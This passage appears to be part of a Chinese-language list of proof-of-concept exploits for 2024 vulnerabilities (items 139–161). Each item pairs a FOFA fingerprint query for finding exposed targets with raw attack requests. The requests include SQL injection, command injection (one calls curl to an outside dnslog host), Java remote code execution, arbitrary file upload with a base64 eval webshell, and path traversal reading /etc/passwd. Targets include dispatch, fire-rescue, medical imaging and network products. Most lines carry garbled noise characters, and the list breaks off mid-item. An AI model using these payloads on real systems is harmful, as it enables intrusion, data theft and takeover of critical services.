8 O( X' l) f: K5 Z4 {2 |: XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; S: }9 X( r! V4 o# rAccept-Encoding: gzip, deflate, br
. m2 q' j. h& n- ^( P6 ]Connection: close t, j: V ^- M! q2 v, S9 n. }
Upgrade-Insecure-Requests: 1! ]2 w6 l6 x C* i# X. p
$ b D' p1 D7 G) p
' Y: D5 G. s& d/ |! \
139. 福建科立讯通信指挥调度平台editemedia.php sql注入" k {8 Z! l9 |8 B% N# e; E, S9 C7 B
CVE-2024-2622
% U7 H- L$ c2 |# F, _FOFA:body="app/structure/departments.php" || app="指挥调度管理平台": ?2 Q. M b$ s! O$ W6 ^
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1% Z) P' w1 I0 B, j$ M$ k3 Q
Host: x.x.x.x
( q# C. k0 m4 s w7 ^7 M+ o' wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% E1 a2 w2 V" ~* G! s0 X/ V% w) T/ e o e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- l/ Q2 r( I( u* SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 }: Y, U9 s) J! [/ XAccept-Encoding: gzip, deflate, br
' p- Q. Y3 {2 fConnection: close
- H2 S4 ]8 m* {; J* w9 a/ KCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
) O8 s% B& I. c, Y* EUpgrade-Insecure-Requests: 1
$ J0 }2 ?! k/ b4 M V5 Z, w% f1 c- X' J) X0 } P3 M- r% |
1 Q7 i6 [. P6 f8 u# T2 m% t
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入% r9 F2 T( M Y
CVE-2024-2566* C- x- f3 j1 b; p/ u5 R( J$ q
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
7 h) Z9 v4 X1 D y. X- z% IGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
' c' |3 M+ H& Y: I( t/ F9 PHost: x.x.x.x
# Q. j! g( v/ A, Y+ o/ H8 C* BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0' \" e5 {0 f- ~4 U& t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ J8 T% {$ H+ F0 x" g5 J3 V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# G6 G- u. X/ {% ~( Z' D4 w
Accept-Encoding: gzip, deflate, br; ^5 ?3 C( f( ` f4 k
Connection: close+ {+ T! k7 N# Z+ G/ T. P1 }
Cookie: authcode=h8g9; D' \/ U' w! l1 R! f
Upgrade-Insecure-Requests: 1
j0 z; F6 e- f! ^/ H# V5 ?9 m$ S5 a. B5 S: V8 q
' I) \* u! N0 w141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入" A0 v9 \5 ]+ L' `* L7 z$ [
FOFA:body="指挥调度管理平台"4 G2 U4 S# ]; i: X: T
POST /app/ext/ajax_users.php HTTP/1.1
6 U4 w, a8 ~0 |& F* P; o. u$ fHost: your-ip* s% T# s: r, X. D( Y8 V$ w
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
" ]; W3 m% p7 j! xContent-Type: application/x-www-form-urlencoded5 h# ~2 w. w. ?$ H
' R: }5 o3 N, g+ h$ Y
3 U( @" C o9 Kdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -( ]9 a0 V1 ~; V& v, x5 k4 H+ C
* v- T K$ F$ {4 b
% z7 g" I4 S0 Q2 H3 ?142. CMSV6车辆监控平台系统中存在弱密码+ }& l4 M' E# S3 F9 @
CVE-2024-29666
% g$ K$ E. D o* Z; ^FOFA:body="/808gps/"& e0 n: w. {5 T7 s# |' c
admin/admin6 \ B/ L! D8 _( H
143. Netis WF2780 v2.1.40144 远程命令执行
2 d4 v9 Y7 v& w6 y8 b8 @9 w& c% cCVE-2024-258502 [3 D1 \8 ]; l% z
FOFA:title='AP setup' && header='netis'
, h9 u# z; z/ s7 HPAYLOAD
1 E; H3 k' L- P3 t1 p Z; W p' Z: C9 ~# L( P" v4 }
144. D-Link nas_sharing.cgi 命令注入
9 K. o1 E, V7 i. Y9 ~: BFOFA:app="D_Link-DNS-ShareCenter"7 t6 s- I, _7 d8 I+ w
system参数用于传要执行的命令
: `# S+ e) i n0 [" Q, \# CGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
* u2 p, M, h/ R4 T" c2 j7 zHost: x.x.x.x# [5 O Y6 X r7 v0 r6 ~- H
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.03 ?! _' g2 V5 ?0 Z/ Q
Connection: close. p, b G) U* u0 h0 e, j
Accept: */*, ]5 q# F% F6 [( b; k
Accept-Language: en3 ]4 p& Y, ] j0 b6 ?9 s
Accept-Encoding: gzip) X- q1 n+ [( t6 I
9 u4 o; H2 a( j
+ R `* ], i* Y2 X6 X2 V
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入% S/ X$ i6 K6 d
CVE-2024-3400
2 @7 }2 }' b- l9 U B1 a+ c2 a- QFOFA:icon_hash="-631559155"+ O2 {2 w' `( W$ z* Y! ]1 a, q. K
GET /global-protect/login.esp HTTP/1.1
! {2 f1 D5 T c. @& E: I {Host: 192.168.30.112:1005; o9 i* k4 P R0 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84% o7 V8 b8 I( d! N ?/ _: F) Q
Connection: close' d d J2 p" i8 M
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
+ i$ a* m8 ]* p. N1 gAccept-Encoding: gzip W0 }# B. u- x& {: y) @
3 j! O0 F- K0 n+ s! ~/ h' V; I
- c# o% q7 V8 @* g" j) ]' {* q146. MajorDoMo thumb.php 未授权远程代码执行
! F0 R$ c s, F) O1 q5 pCNVD-2024-02175
% S; l( w$ |6 o' R2 \FOFA:app="MajordomoSL"
8 P+ ^/ q+ \' O! G' ]$ \GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1& `5 y& W, u& j! z7 }$ [0 ?
Host: x.x.x.x- ?( f- M( c) o4 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84: A, V* }6 _% S
Accept-Charset: utf-8
2 c: P6 j# i: n+ b1 YAccept-Encoding: gzip, deflate4 H7 @2 G4 o; {( [( Y
Connection: close
: Q& G" \2 G- o6 E* J- |3 b, R- L
/ M* M1 W/ K# a, S6 Q% N6 x
2 k- D" j; g, F) a, _% H5 I+ `147. RaidenMAILD邮件服务器v.4.9.4-路径遍历- y4 K; x" b3 L0 X
CVE-2024-32399
/ g+ g9 v4 [3 Z: @FOFA:body="RaidenMAILD"* x/ ]$ f, @6 X& C. c6 U
GET /webeditor/../../../windows/win.ini HTTP/1.10 o4 x) {- Y' d1 c' E7 ^
Host: 127.0.0.1:81( i+ ~/ d$ g6 q
Cache-Control: max-age=0
0 G0 i( o6 @4 Z7 Y" g8 @4 {$ vConnection: close. N9 B3 R, Z" d' K
0 P' o9 s2 Z3 q5 `: q
- o1 u/ w& A2 X, F! s- N" h148. CrushFTP 认证绕过模板注入
2 e; V1 a) [) q$ J8 \/ r$ m3 i) JCVE-2024-4040) N, V4 ~3 ? P! T9 f
FOFA:body="CrushFTP"
) g t5 D& D; VPAYLOAD
/ v6 N- [4 Y6 g+ r% |* Z* u K; Y1 a8 Q: b N
149. AJ-Report开源数据大屏存在远程命令执行- E3 O4 u% e8 ?2 e& e% {- N
FOFA:title="AJ-Report", G4 l. _: R0 p1 ] _
- X+ D) b$ g9 s3 E# _POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
; `) E% Q$ n9 V" q# L) V2 Z4 SHost: x.x.x.x
' i& o" |" S0 o! |( |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
( l+ P: b, j' N! U# R$ r+ m6 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 P* r& Q1 U0 x
Accept-Encoding: gzip, deflate, br' E: C3 v0 U$ p+ D. o2 P( L- [
Accept-Language: zh-CN,zh;q=0.9/ E" H( ?" s0 o4 \, Q2 {
Content-Type: application/json;charset=UTF-8
! C* v5 m/ o4 H) tConnection: close
& z( a7 W# M; n
4 W3 @- W- Y* B0 u4 w{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
9 a* P. e, m( N3 {9 H& D" K1 V
7 T2 V @! ?7 A$ J: a' E. R5 s150. AJ-Report 1.4.0 认证绕过与远程代码执行$ S8 o+ v, p# b4 Q. K$ w% _$ Z
FOFA:title="AJ-Report"8 W7 u$ Y: i, s+ h. h$ `3 V8 T
POST /dataSetParam/verification;swagger-ui/ HTTP/1.13 V/ e" S+ N' t8 G5 Z+ q) S2 R
Host: x.x.x.x- N+ Q% n; K6 [1 W; t' a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
) i- v6 d& P# ~/ x7 l" J5 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! @0 J- u/ g1 G+ n
Accept-Encoding: gzip, deflate, br2 S8 t6 g$ f+ A" Z E# w
Accept-Language: zh-CN,zh;q=0.9( {0 m( ~/ N' g- ]! I4 V/ e( E/ C/ y
Content-Type: application/json;charset=UTF-8
( z% K ?; @# T/ Y6 CConnection: close+ [6 U- [4 F5 N( G1 }0 z; _
Content-Length: 3397 h( K+ f. I( x+ W' U) J8 n
# m2 L" G3 G, ?" C/ F- u- Y4 j
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
8 j9 m# ^. i6 p. B
2 Y% g" c2 g1 Q8 L2 i4 K* e9 v
( o/ O+ j, J1 }3 W0 E151. AJ-Report 1.4.1 pageList sql注入
T K( t; l4 V6 r7 w" G, L1 @% NFOFA:title="AJ-Report"
1 U5 N3 z% V% z/ ^5 e+ D7 J% [GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1' M3 \/ Y$ y0 R/ @' T- V+ X
Host: x.x.x.x
( w( u J+ G, @' @4 H) fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" N; a( m# y4 T O$ Y" p% rConnection: close
" O* E9 O' h2 @, b) D! V5 IAccept-Encoding: gzip! y L0 C. m9 O% \* _
: @# x% k) |/ H; A. r
3 J6 ]! E# j, l6 T: y8 {1 ?152. Progress Kemp LoadMaster 远程命令执行
1 r5 H/ J) o+ v" E5 rCVE-2024-1212) ^2 f. H( |& \" F$ F) S
LoadMaster <= 7.2.59.2 (GA) j+ _) f$ W, {* w$ L& u
LoadMaster<=7.2.54.8 (LTSF)/ O {3 G' v7 ]2 f1 [
LoadMaster <= 7.2.48.10 (LTS)1 x# X2 B: r1 f0 a
FOFA:body="LoadMaster"
' d" ^, z1 f6 g3 b8 p$ sJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
) @9 C, Z& y8 X2 b- W# IGET /access/set?param=enableapi&value=1 HTTP/1.1& R3 \( t, c7 E6 z+ a
Host: x.x.x.x9 D7 d5 v9 i# f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
% Z2 s, Z, \$ s( b- ]Connection: close
4 B4 J0 j+ E9 V7 l4 _8 t8 d1 jAccept: */*. n1 J7 e. F- P3 t
Accept-Language: en5 c0 s1 s) W$ ]) f+ B. L, W
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
3 w3 Z% F* ^8 y1 aAccept-Encoding: gzip9 r5 R6 y: y( }& U
3 I8 \/ j% C% g3 B- Z3 X! ~' K' }' F9 o6 a/ o& E
153. gradio任意文件读取4 |% C) U% ]( G) u" _. v% F
CVE-2024-1561FOFA:body="__gradio_mode__"( _ ?; E1 ~9 X! E8 }5 P- h# R( x
第一步,请求/config文件获取componets的id G1 C5 f& l) t4 p' k% Y
http://x.x.x.x/config: i( Y& E/ q6 y5 q* p5 `. a
3 H) k: q8 q6 X- m" U
6 e$ L; I: {, M0 u第二步,将/etc/passwd的内容写入到一个临时文件
- F4 e7 H. T; t4 z" zPOST /component_server HTTP/1.1 F8 v S8 C7 R6 R$ H0 @! ?6 u3 A
Host: x.x.x.x, n" c$ _' j+ a1 {" `% ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3% q' f% e4 w5 Z. p8 P
Connection: close' j8 ]5 D4 e! L2 T: t8 r
Content-Length: 115
6 f8 X+ ?$ k% f+ M& JContent-Type: application/json
. J# r" p+ j5 @/ kAccept-Encoding: gzip
9 {7 C9 g& H) H8 I$ d4 q% s
A5 ~( {- y: a; b{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
7 I; D" o0 X9 M" T, g0 j8 g \, I8 E! ]5 ^
, w1 e! F+ W% T/ s0 C& L
第三步访问$ x1 D+ n6 [! i; O1 J/ b! ?
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
" y: t' v' e4 }& I
$ D8 G0 F& a9 p# ~6 W3 z$ c' M
9 W8 T+ a6 A W& m% u D M154. 天维尔消防救援作战调度平台 SQL注入
7 c5 v- O; n zCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"- M. H0 ~5 N6 h4 }2 d
POST /twms-service-mfs/mfsNotice/page HTTP/1.1, {- l$ C( h& p5 O, s8 ^5 D
Host: x.x.x.x4 s$ H8 Y5 E+ j3 {" o( ~8 V
Content-Length: 106
( e* R6 R4 i J6 ~Cache-Control: max-age=0' l" a6 T3 M ]2 F) B( m( E) l/ n
Upgrade-Insecure-Requests: 16 |8 O, A2 [9 l! N4 [
Origin: http://x.x.x.x
5 y Z6 q( A/ ~4 O9 bContent-Type: application/json
' W: t9 P% G# F4 V4 D% P1 Z7 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36! _; Q0 q8 |! h: w- u$ K7 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! M7 I- M1 @/ K+ g& _Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page( h: l+ x% \+ ~9 r/ |7 v3 f
Accept-Encoding: gzip, deflate
1 h/ Z/ x. @$ ?Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
) t) r4 u1 f' m- ^( u/ XConnection: close
# c+ Y2 r7 m' I3 I7 O$ {. u
; g& `9 m s4 A. u) f* k{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}1 i* x* M2 x7 j0 V3 Y4 p* d. Y5 n
. ^2 u8 G# X: ^! o% G
1 @. j2 K8 A- ]3 {. z
155. 六零导航页 file.php 任意文件上传
+ U8 A& a. }/ i) W; aCVE-2024-34982 ^- @. G0 `/ O4 z3 W
FOFA:title=="上网导航 - LyLme Spage"
% B) H$ q- g! P+ K: P5 g6 v' v _' h: BPOST /include/file.php HTTP/1.1
$ u( b% Y) T* r' h* c- f: KHost: x.x.x.x
- t+ I+ `7 [1 f$ W7 F7 G4 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
3 Z! q* }7 q$ S- ^* S5 nConnection: close I2 U& d& }( ~# b( P
Content-Length: 2325 M: B6 R4 W& k# L8 T2 ~: b
Accept: application/json, text/javascript, */*; q=0.01
& ?( X) E( O$ L h' N9 wAccept-Encoding: gzip, deflate, br
3 ]7 G1 a q c1 C6 zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 y9 b1 g+ ?" h8 P- r( C, A, H* {Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
* k' r' l% W: K/ q4 W4 XX-Requested-With: XMLHttpRequest
$ @- i0 U3 C P3 f2 r# v, ~. o2 @
# L; {+ C- |! q- J-----------------------------qttl7vemrsold314zg0f
0 R$ @2 ]! q6 ^, DContent-Disposition: form-data; name="file"; filename="test.php"0 i/ b6 _( u8 B: b; N3 `( v
Content-Type: image/png1 W) |" P7 j$ I) ^4 W3 M* f
" x: t) @! Q: C% a, y$ s" Q) D; T
<?php phpinfo();unlink(__FILE__);?>( q7 ^6 M" l' u+ C" U
-----------------------------qttl7vemrsold314zg0f--' V; g. H) I p) R# I1 |
0 d- M- I+ R9 _/ x, y. r+ O
) t# w X2 m1 o4 f2 ]访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
/ G) P; H( P2 K$ b) w a3 l
: }7 \+ w5 Y! ]+ \$ j156. TBK DVR-4104/DVR-4216 操作系统命令注入
" E, t$ T" s( U% r3 GCVE-2024-3721! T: a, s# _) w j' S3 N
FOFA:"Location: /login.rsp") \- z$ e, m. G" X/ f* _% L9 z
·TBK DVR-41040 Z# r8 }, ^. S. U" ~" d
·TBK DVR-4216. C. J/ F, G3 a& B+ X9 [% J
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"- W7 z5 {7 C% [
0 \" t3 }* d. v7 T9 f/ L
, c. d5 N( n, m5 Q4 }7 DPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
) O- H* ~! W/ `: M5 gHost: x.x.x.x
; D) m! S' ?( f4 U, K1 m7 E. {$ MUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 l d1 u- ^5 k6 z% H+ w8 `
Connection: close
- f, L& l7 p. T: u- Z, f pContent-Length: 08 `/ U2 t9 v; L7 {( n1 k1 x
Cookie: uid=1
% V# N3 u8 o/ D7 i/ d& t& WAccept-Encoding: gzip( z0 \+ ?2 d7 X6 \4 v1 s
+ p' h: C6 k% {. t8 k2 z8 @; S! w4 e. r& V+ ?& b9 D4 P3 F
157. 美特CRM upload.jsp 任意文件上传; E/ I$ i! [, j0 A# b
CNVD-2023-06971
2 R( l# w0 d. @' I# U' \FOFA:body="/common/scripts/basic.js"
5 B0 j1 ]2 h( U( m' d1 Q0 hPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
) m" v' T' s3 m: G: e! Q. `Host: x.x.x.x- ?6 c8 h0 c, h# f7 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
7 q5 F! j+ B2 G9 T& wContent-Length: 709
" I# G% Q' M: D8 r! ?( tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- |' l, l8 z4 E) M7 D' E: Q; K
Accept-Encoding: gzip, deflate
/ {% J% A$ T8 R9 R5 NAccept-Language: zh-CN,zh;q=0.9* q/ a' L# W3 S
Cache-Control: max-age=0; q7 G ?" X: x t
Connection: close3 w9 N1 [% ^, M/ E$ C" F$ w+ k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
: W, a/ t" r' U; S! BUpgrade-Insecure-Requests: 1, p2 s# }) Z1 O4 @* ~& g6 b
" e6 m! V6 z4 V' R, Z( w------WebKitFormBoundary1imovELzPsfzp5dN
5 _% z! ]- W+ W4 J T9 k0 rContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
* y9 P1 ~% g3 k( J' d9 tContent-Type: application/octet-stream; W! e$ D. `% s, O
2 N3 |- u: S( n( D6 O! n
nyhelxrutzwhrsvsrafb
' J" F. `* {! d% e& P# a------WebKitFormBoundary1imovELzPsfzp5dN
1 _$ D2 G& D/ z1 G7 WContent-Disposition: form-data; name="key"& K7 Z; l* s8 Q2 [
' `1 }/ Q, m' ?7 C H5 ^null7 C% |/ Z, L, A% N
------WebKitFormBoundary1imovELzPsfzp5dN
$ C2 m% a* M% e( S( uContent-Disposition: form-data; name="form"
# z* p& l. g; ~7 k4 K* b) S" P9 z/ q, E$ A7 F j$ S
null
) x0 k, f8 x8 y# P------WebKitFormBoundary1imovELzPsfzp5dN
4 R& G _" l! [* C2 L3 }. aContent-Disposition: form-data; name="field"9 o# M& n% n( O2 b
4 _1 }+ J/ E* I+ Y0 X' U" gnull( n9 J; C; g& D# A {9 ^8 |2 I4 S
------WebKitFormBoundary1imovELzPsfzp5dN, |+ f+ {5 j* X, U8 Q6 P+ U7 [ U
Content-Disposition: form-data; name="filetitile"1 t3 l8 `5 j& b0 l \, W( `
8 \) f) ~/ K; A
null
( s+ Z( K. a2 W" g/ B% ]( c------WebKitFormBoundary1imovELzPsfzp5dN( R# d z3 |6 ^
Content-Disposition: form-data; name="filefolder"& r6 M0 l; h# ~3 Y( L! e9 I5 b4 I
7 e6 P: e- \! p& k' V% _' nnull
( f, v( |3 J! o6 o! u& \0 S------WebKitFormBoundary1imovELzPsfzp5dN--" S: w/ \+ G9 I, h
% T: X9 y) A% g
8 r2 K/ x! B0 l! o7 ]6 o9 A& D2 X/ Ghttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
$ D) R% w5 y0 J2 ^$ I% k3 u$ ?9 t2 \7 F+ x- K3 ]% G8 m
158. Mura-CMS-processAsyncObject存在SQL注入( p" r4 `+ Z2 I- H+ d/ T
CVE-2024-32640/ o, s1 @8 r4 b. f- n8 ?
FOFA:"Generator: Masa CMS"; a- G% ]) v0 B* o: w- \
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
$ ]1 C q) P/ j" ~Host: {{Hostname}}4 i7 u V2 I8 d, f- j# m# e) v" W- d
Content-Type: application/x-www-form-urlencoded
) o* f5 P- L; \0 K. k' q6 h5 L6 I, t0 D8 C$ e* L1 N
object=displayregion&contenthistid=x\'&previewid=1
1 j$ g8 O( u2 P% Q( L
! I) |4 a6 I( L* P& n
+ n! e& F% j: z% c159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传" ^* [4 v: o: ~3 I, x0 j
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
. O2 b2 m1 c3 \1 W U' l" v/ jPOST /webservices/WebJobUpload.asmx HTTP/1.1
; ?" ]: u, i' ~Host: x.x.x.x. }- u( ~' s5 m1 j# f: u* {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
& P3 X& z- G! k4 q; q( [& e4 eContent-Length: 1080" z3 X, N% y6 m/ F+ a
Accept-Encoding: gzip, deflate( _- _' D, r2 {. }- L! j$ p2 C" R
Connection: close2 P. R* F) {( x4 Q" _" C8 {4 d
Content-Type: text/xml; charset=utf-8; y# n: @7 o8 r- {* D
Soapaction: "http://rainier/jobUpload"0 r, Q; P/ w9 L+ U! I) {5 Q
, E; I2 n. c" I. T' h8 m<?xml version="1.0" encoding="utf-8"?>& w. o' z, y& V; L
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">- P# ~" L: K7 [6 [& W0 R
<soap:Body>4 A6 e7 Z) j# L, C
<jobUpload xmlns="http://rainier">
4 a7 K& h6 u, @0 e<vcode>1</vcode>
- I2 g% q9 o k) C5 f0 L<subFolder></subFolder>( c8 D" H, d1 W# q- L% a' U# N }
<fileName>abcrce.asmx</fileName>
6 e, A6 y1 i' @: T& D8 \) k<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
: D; z4 L5 d; L: W, W8 w</jobUpload>! S' V' U, e# \
</soap:Body>4 @! U; M8 E: [" `
</soap:Envelope>
# |- \* J0 y* C1 B7 f& [ [, ~' [2 o
% c- \6 Y) D' c7 b- ^/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")1 ^# H: r1 l4 Z7 q2 U; x5 h5 y$ J; X
4 h8 M+ w1 {% ]
* r% N* ~* e+ Q% L3 E
160. Sonatype Nexus Repository 3目录遍历与文件读取; D: W B- e2 ?& F, f9 X
CVE-2024-49565 G; x& U# \1 x( W" e5 C* {
FOFA:title="Nexus Repository Manager"# p1 y6 l6 a0 U" |$ Y4 S7 f0 _
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1& D' ]* A; W: z2 r4 I1 ]0 d
Host: x.x.x.x: R* l% } T% K, q- s @" v8 L
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
$ I! t0 X1 g3 {& a1 `' n: L# SConnection: close
0 |$ ?' A4 {# _$ v& A: [Accept: */*
/ H5 {) D _, D# [/ s- [& j8 @Accept-Language: en
2 k! j3 N/ Q$ d4 k+ {0 y5 hAccept-Encoding: gzip
8 M9 p; D3 _) p: E7 b6 X; I; P& p; J
1 V' O! \7 |9 Q( y7 d4 q0 E7 E161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传( V4 E( H0 }& U7 r u+ ^
FOFA:body="/KT_Css/qd_defaul.css"% W7 `2 S Z j
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
& I: T! q( A9 f: XPOST /Webservice.asmx HTTP/1.1( Y: I/ X4 F0 \5 I' v4 q
Host: x.x.x.x
6 _0 k w. ]; bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
